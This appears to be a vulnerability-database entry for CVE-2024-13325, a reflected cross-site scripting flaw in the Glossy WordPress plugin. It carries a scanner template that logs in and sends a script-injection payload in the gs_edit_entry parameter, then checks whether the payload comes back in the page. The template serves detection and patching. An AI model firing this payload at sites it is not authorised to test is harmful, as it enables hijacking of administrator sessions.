Glossy WordPress - Reflected XSS
CVE-2024-13325
Verified
Description
Glossy WordPress plugin v2.3.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click a malicious link.
Severity
Medium
CVSS Score
6.1
Exploit Probability
1%
Affected Product
glossy
Published Date
February 6, 2026
Template Author
sourabh-sahu
CVE-2024-13325.yaml
id: CVE-2024-13325
info:
name: Glossy WordPress - Reflected XSS
author: Sourabh-Sahu
severity: medium
description: |
Glossy WordPress plugin v2.3.5 contains a reflected cross-site scripting caused by unsanitized parameter output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to click a malicious link.
impact: |
Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
remediation: |
Update to the latest version of the plugin where the vulnerability is fixed.
reference:
- https://wpscan.com/vulnerability/49bddf87-c578-47b7-a8fb-4dc550bbaa47/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-13325
cwe-id: CWE-79
epss-score: 0.00572
epss-percentile: 0.4469
cpe: cpe:2.3:a:croberts:glossy:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: croberts
product: glossy
tags: cve,cve2024,croberts,glossy,authenticated,xss,wordpress,wp-plugin,wp
flow: http(1) && http(2)
http:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=
matchers:
- type: dsl
dsl:
- contains(header, "wordpress_logged_in")
internal: true
- raw:
- |
GET /wp-admin/admin.php?page=glossy-add-entry&gs_edit_entry=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains_all(body, "></script><script>alert(document.domain)</script><script>","glossy")
condition: and
# digest: 4a0a0047304502200d92ee6886474559f3c6d6715e1ad1aa7209c3c71c7e75a9c737f081bd76b5cb0221008e677f1e03ed79cffac3c48ac1973e033637d25950a831fc7b633b7dbfb6dd21:922c64590222798bb761d5b6d8e729506.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CVE ID:
cve-2024-13325
CWE ID:
cwe-79
Remediation Steps
Update to the latest version of the plugin where the vulnerability is fixed.